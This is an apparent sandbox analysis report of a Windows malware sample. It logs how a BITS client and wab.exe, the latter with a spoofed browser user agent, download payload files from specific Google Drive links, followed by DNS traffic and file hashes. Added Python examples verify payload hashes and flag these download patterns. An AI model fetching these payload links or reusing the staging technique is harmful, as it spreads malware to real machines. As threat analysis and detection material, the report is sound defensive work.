Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Manegeklovners.u32"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, 
X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 511832
Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
Date: Tue, 05 Mar 2024 09:16:42 GMT
Expires: Tue, 05 Mar 2024 09:16:42 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=7+PVzg==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address: 172.217.169.78:443
Request
GET /uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Cache-Control: no-cache
Response
HTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:17:18 GMT
Location: https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-vELJgGEgfIkajmUD7ZJwEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GET https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download wab.exe
Remote address: 142.250.179.225:443
Request
GET /download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: Keep-Alive
Cache-Control: no-cache
Host: drive.usercontent.google.com
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="LRKVASBQNAJnYAeoGMaND130.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, 
X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 241728
Last-Modified: Mon, 04 Mar 2024 22:32:42 GMT
Date: Tue, 05 Mar 2024 09:17:20 GMT
Expires: Tue, 05 Mar 2024 09:17:20 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=KuIstA==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
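Both payload downloads above arrive with an X-Goog-Hash: crc32c=... header, which Google's upload server sets to the base64 encoding of the object's CRC-32C in big-endian byte order. A responder who later re-fetches either Drive object (while it is still live) can use that value to confirm they hold the same bytes the sandbox received, before spending time on a file that may have been swapped out. The following Python is an added example and is not part of this report or of the analysed sample: the CRC-32C routine is a plain table-driven implementation so nothing outside the standard library is needed, the two header values are copied from the responses above, and the blob in the demo is a constructed stand-in for a re-fetched payload.

```python
import base64

_CRC32C_POLY = 0x82F63B78   # CRC-32C (Castagnoli) in reflected form


def _build_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ _CRC32C_POLY if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _build_table()


def crc32c(data: bytes) -> int:
    """Table-driven CRC-32C; the standard check value for b'123456789' is 0xE3069283."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc = _TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def parse_goog_hash(header: str) -> dict:
    """Split an X-Goog-Hash value such as 'crc32c=7+PVzg==,md5=...' into {name: digest bytes}."""
    digests = {}
    for item in header.split(","):
        name, _, b64 = item.strip().partition("=")   # split on the first '=' only; base64 padding may follow
        digests[name.lower()] = base64.b64decode(b64)
    return digests


def goog_hash_header(data: bytes) -> str:
    """The crc32c= value Google sends for data: base64 of the big-endian CRC-32C."""
    return "crc32c=" + base64.b64encode(crc32c(data).to_bytes(4, "big")).decode()


def goog_hash_matches(data: bytes, header: str) -> bool:
    """True when data's CRC-32C equals the crc32c digest carried in header."""
    digest = parse_goog_hash(header).get("crc32c")
    if digest is None or len(digest) != 4:
        raise ValueError("X-Goog-Hash carries no usable crc32c digest")
    return crc32c(data) == int.from_bytes(digest, "big")


# X-Goog-Hash values copied from the two payload responses in this capture.
CAPTURED_HASHES = {
    "Manegeklovners.u32": "crc32c=7+PVzg==",
    "LRKVASBQNAJnYAeoGMaND130.bin": "crc32c=KuIstA==",
}

if __name__ == "__main__":
    # Constructed blob standing in for a re-fetched payload; the real files are not on this page.
    blob = b"constructed sample payload, not the real Drive object"
    header = goog_hash_header(blob)
    print(header, goog_hash_matches(blob, header), goog_hash_matches(blob + b"!", header))
```

To check a real re-download, read the file and call `goog_hash_matches(data, CAPTURED_HASHES["Manegeklovners.u32"])`. CRC-32C is an integrity check, not a cryptographic one: it tells you whether Google served the same object, but it is not collision-resistant, so record the SHA-256 of the retrieved bytes alongside it.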
411 B sent, 2.7kB received, 6 / 4 packets
HTTP Request: GET http://repository.certum.pl/ctnca.cer
HTTP Response: 200
-
172.217.169.78:443  https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs  tls, http
2.2kB sent, 12.8kB received, 16 / 15 packets
HTTP Request: HEAD https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs
HTTP Response: 303
HTTP Request: GET https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs
HTTP Response: 303
HTTP Request: HEAD https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs
HTTP Response: 303
HTTP Request: GET https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs
HTTP Response: 303
-
142.250.179.225:443  https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download  tls, http
21.0kB sent, 1.1MB received, 428 / 817 packets
HTTP Request: HEAD https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
HTTP Response: 200
HTTP Request: GET https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
HTTP Response: 200
HTTP Request: HEAD https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
HTTP Response: 200
HTTP Request: GET https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
HTTP Response: 200
-
172.217.169.78:443  https://drive.google.com/uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi  tls, http  wab.exe
946 B sent, 9.0kB received, 9 / 12 packets
HTTP Request: GET https://drive.google.com/uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi
HTTP Response: 303
-
142.250.179.225:443  https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download  tls, http  wab.exe
6.4kB sent, 264.2kB received, 118 / 197 packets
HTTP Request: GET https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download
HTTP Response: 200
-
132 B sent, 213 B received, 2 / 1 packets
DNS Request: repository.certum.pl
DNS Request: repository.certum.pl
DNS Response: 23.48.165.139, 23.48.165.155
-
62 B sent, 78 B received, 1 / 1 packets
DNS Request: drive.google.com
DNS Response: 172.217.169.78
-
148 B sent, 90 B received, 2 / 1 packets
DNS Request: drive.usercontent.google.com
DNS Request: drive.usercontent.google.com
DNS Response: 142.250.179.225
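The exchanges summarised above show a pattern worth turning into detection logic: a Microsoft BITS/7.5 user agent pulling an application/octet-stream attachment with an odd extension (.u32) from drive.usercontent.google.com, and then wab.exe (the Windows Address Book, not a browser) following the drive.google.com 303 redirect with a Firefox user agent to fetch a second octet-stream attachment (.bin). The Python below is an added example, not part of this report: it parses a constructed capture that reproduces those three exchanges in the same first line / Request / Response layout this page uses, trimmed to the headers the rules need, and applies four rules to each exchange. The allow-list of expected attachment extensions is an assumption to be tuned per environment.

```python
import re
from dataclasses import dataclass
from os.path import splitext
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample: the three payload exchanges from this capture in the
# page's own "first line / Request / Response" layout, trimmed to the
# headers the rules below look at. The first exchange carries no process
# name in the report, so none is given here.
SAMPLE_CAPTURE = """\
GET https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Request
GET /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
User-Agent: Microsoft BITS/7.5
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="Manegeklovners.u32"
-
GET https://drive.google.com/uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi wab.exe
Request
GET /uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Response
HTTP/1.1 303 See Other
Location: https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download
-
GET https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download wab.exe
Request
GET /download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="LRKVASBQNAJnYAeoGMaND130.bin"
-
"""


@dataclass
class Exchange:
    url: str
    process: Optional[str]      # None when the report shows no process for the flow
    req_headers: dict           # lower-cased header name -> value
    status: int
    resp_headers: dict


def _headers(lines):
    out = {}
    for line in lines:
        name, _, value = line.partition(":")
        out[name.strip().lower()] = value.strip()
    return out


def parse_capture(text: str) -> list:
    """Split the capture on '-' separator lines and build one Exchange per block."""
    exchanges = []
    for block in text.split("\n-\n"):
        lines = [l for l in block.splitlines() if l.strip()]
        if not lines:
            continue
        head = lines[0].split()                                 # METHOD URL [process]
        req_i, resp_i = lines.index("Request"), lines.index("Response")
        exchanges.append(Exchange(
            url=head[1],
            process=head[2] if len(head) > 2 else None,
            req_headers=_headers(lines[req_i + 2:resp_i]),      # skip the request line itself
            status=int(lines[resp_i + 1].split()[1]),            # "HTTP/1.1 303 See Other" -> 303
            resp_headers=_headers(lines[resp_i + 2:]),
        ))
    return exchanges


FILE_SHARING_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
BROWSER_PROCESSES = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Assumption: extensions an octet-stream attachment is expected to carry; tune per environment.
EXPECTED_ATTACHMENT_EXT = {".pdf", ".docx", ".xlsx", ".pptx", ".zip", ".txt", ".png", ".jpg"}
REDIRECTS = {301, 302, 303, 307, 308}


def triage(ex: Exchange) -> list:
    """Return the names of the rules this exchange trips, in rule order."""
    findings = []
    host = urlsplit(ex.url).hostname or ""
    ua = ex.req_headers.get("user-agent", "")
    if ua.startswith("Microsoft BITS/") and host in FILE_SHARING_HOSTS:
        findings.append("bits-download-from-file-sharing-host")
    # wab.exe is the Windows Address Book; a browser UA from a non-browser process is spoofed
    if ex.process and ex.process.lower() not in BROWSER_PROCESSES and ua.startswith("Mozilla/"):
        findings.append("non-browser-process-with-browser-user-agent")
    m = re.search(r'filename="([^"]+)"', ex.resp_headers.get("content-disposition", ""))
    if m and ex.resp_headers.get("content-type") == "application/octet-stream":
        ext = splitext(m.group(1))[1].lower()
        if ext not in EXPECTED_ATTACHMENT_EXT:
            findings.append("octet-stream-attachment-unusual-extension:" + ext)
    if ex.status in REDIRECTS and "export=download" in ex.url:
        findings.append("drive-direct-download-redirect")
    return findings


if __name__ == "__main__":
    for ex in parse_capture(SAMPLE_CAPTURE):
        print(ex.process or "-", ex.status, ex.url, triage(ex))
```

The BITS rule is the one with the best signal-to-noise: BITS is a legitimate Windows transfer service, but an interactive user rarely drives it at a consumer file-sharing host, and the Drive direct-download redirect on its own is benign, so it is reported as context rather than as an alert.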
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize 67KB
MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 2666d3a2dd149e0fb67bb637c3444633
SHA1 743e85cc0a123264ca873766a2aa1afa1e904050
SHA256 073d0e2bbc07ba289c8d46771a8dec37f2e78210909048f508289f8c33b19f65
SHA512 cdcdb57fecc2822b598d9b76e6906777e52459b5c28d1c64d233fe5fcdf0a1b62d304a7e8903f64e019fe0e0f7ce466153848819724cbebc33cbdad20ba92e77
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 91bd7f6b5c7e9d3f1b6557a9cced1c27
SHA1 399799a5a9e70e557c8d892fc7ad2b655c71d878
SHA256 aada99a3378c65a456af17a7f08c77e780ab0f37f0180f7af5a336d794dbad53
SHA512 a37e5d6e43504e7cee8e4f0b0f3fc76d6c6ff77b1c66068b50dd59bdda265c3a5443c85f101db32f6cccd2ee5be01e7b4951f8781c8c48f0eeb9d908f0e2e273
-
Filesize 65KB
MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize 171KB
MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize 175KB
MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D1T70IFUYVPJNGXCEN3H.temp
Filesize 7KB
MD5 c19e4df97e6660399772d7692bcc109b
SHA1 3baf913f010753b22f98f88779cc7cd4a3f9953a
SHA256 851c1bf6443558107ce307226862c2ada7ffe235d3b9a5627fde71c3a1c2f9d5
SHA512 c35e0bf751001d09b06f0974bd115b827049b1d898d56a917bc2eeb6d21a3fb33c84ceabf1fcc0b777344839035ee0b571be8ceb1e0dad260c476590fcaa7da5